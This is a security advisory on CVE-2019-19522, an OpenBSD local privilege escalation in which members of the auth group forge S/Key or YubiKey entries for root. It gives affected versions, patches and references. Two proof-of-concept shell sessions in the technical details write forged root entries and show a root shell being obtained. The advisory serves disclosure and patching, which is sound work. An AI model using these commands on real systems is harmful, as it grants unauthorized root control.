Allele Security Alert
ASA-2019-00653
Identifier(s)
ASA-2019-00653, CVE-2019-19522
Title
Local privilege escalation via S/Key and YubiKey
Vendor(s)
The OpenBSD Project
Product(s)
OpenBSD
Affected version(s)
OpenBSD versions 6.6 before errata 009
OpenBSD versions 6.5 before errata 020
Fixed version(s)
OpenBSD version 6.6 errata 009
OpenBSD version 6.5 errata 020
OpenBSD versions 6.6 with the following patch applied:
009_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/009_mesaxlock.patch.sig
OpenBSD versions 6.5 with the following patch applied:
020_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/020_mesaxlock.patch.sig
Proof of concept
Yes
Description
OpenBSD, in a non-default configuration where S/Key or YubiKey authentication is enabled, allows local users to become root by leveraging membership in the auth group. This occurs because root’s file can be written to /etc/skey or /var/db/yubikey, and need not be owned by root.
Technical details
If the S/Key or YubiKey authentication type is enabled (they are both installed by default but disabled), then a local attacker can exploit the privileges of the group “auth” to obtain the full privileges of the user “root” (because login_skey and login_yubikey do not verify that the files in /etc/skey and /var/db/yubikey belong to the correct user, and these directories are both writable by the group “auth”).
(Note: to obtain the privileges of the group “auth”, a local attacker can first exploit ASA-2019-00651 / CVE-2019-19520 in xlock.)
If S/Key is enabled (via skeyinit -E), a local attacker with “auth” privileges can add an S/Key entry (a file in /etc/skey) for the user “root” (if this file already exists, the attacker cannot simply remove or rename it, because /etc/skey is sticky; a simple workaround exists, and is left as an exercise for the interested reader):
------------------------------------------------------------------------------ $ id uid=32767(nobody) gid=11(auth) groups=32767(nobody) $ echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root $ chmod 0600 /etc/skey/root $ env -i TERM=vt220 su -l -a skey otp-md5 99 obsd91335 S/Key Password: EGG LARD GROW HOG DRAG LAIN # id uid=0(root) gid=0(wheel) ... ------------------------------------------------------------------------------
If YubiKey is enabled (via login.conf), a local attacker with “auth” privileges can add a YubiKey entry (two files in /var/db/yubikey) for the user “root” (if these files already exist, the attacker can simply remove or rename them, because /var/db/yubikey is not sticky):
------------------------------------------------------------------------------ $ id uid=32767(nobody) gid=11(auth) groups=32767(nobody) $ echo 32d32ddfb7d5 > /var/db/yubikey/root.uid $ echo 554d5eedfd75fb96cc74d52609505216 > /var/db/yubikey/root.key $ env -i TERM=vt220 su -l -a yubikey Password: krkhgtuhdnjclrikikklulkldlutreul # id uid=0(root) gid=0(wheel) ... ------------------------------------------------------------------------------
Credits
Qualys Research Team
Reference(s)
OpenBSD 6.6 Errata
https://www.openbsd.org/errata66.html
OpenBSD 6.5 Errata
https://www.openbsd.org/errata65.html
009_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/009_mesaxlock.patch.sig
020_mesaxlock.patch.sig
https://ftp.openbsd.org/pub/OpenBSD/patches/6.5/common/020_mesaxlock.patch.sig
Constrain honouring of path-related environment variables based upon
https://github.com/openbsd/xenocara/commit/5886ab525a096cb2504f9e3ce1cd4fd79fb1e414
Full Disclosure: Authentication vulnerabilities in OpenBSD
https://seclists.org/fulldisclosure/2019/Dec/14
oss-security – Authentication vulnerabilities in OpenBSD
https://www.openwall.com/lists/oss-security/2019/12/04/5
Bugtraq: Authentication vulnerabilities in OpenBSD
https://seclists.org/bugtraq/2019/Dec/8
ASA-2019-00651 – OpenBSD: Local privilege escalation via xlock
https://allelesecurity.com/ASA-2019-00651/
CVE-2019-19520
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19520
CVE-2019-19520
https://nvd.nist.gov/vuln/detail/CVE-2019-19520
CVE-2019-19522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19522
CVE-2019-19522
https://nvd.nist.gov/vuln/detail/CVE-2019-19522
If there is any error in this alert or you wish a comprehensive analysis, let us know.
Last modified: February 11, 2020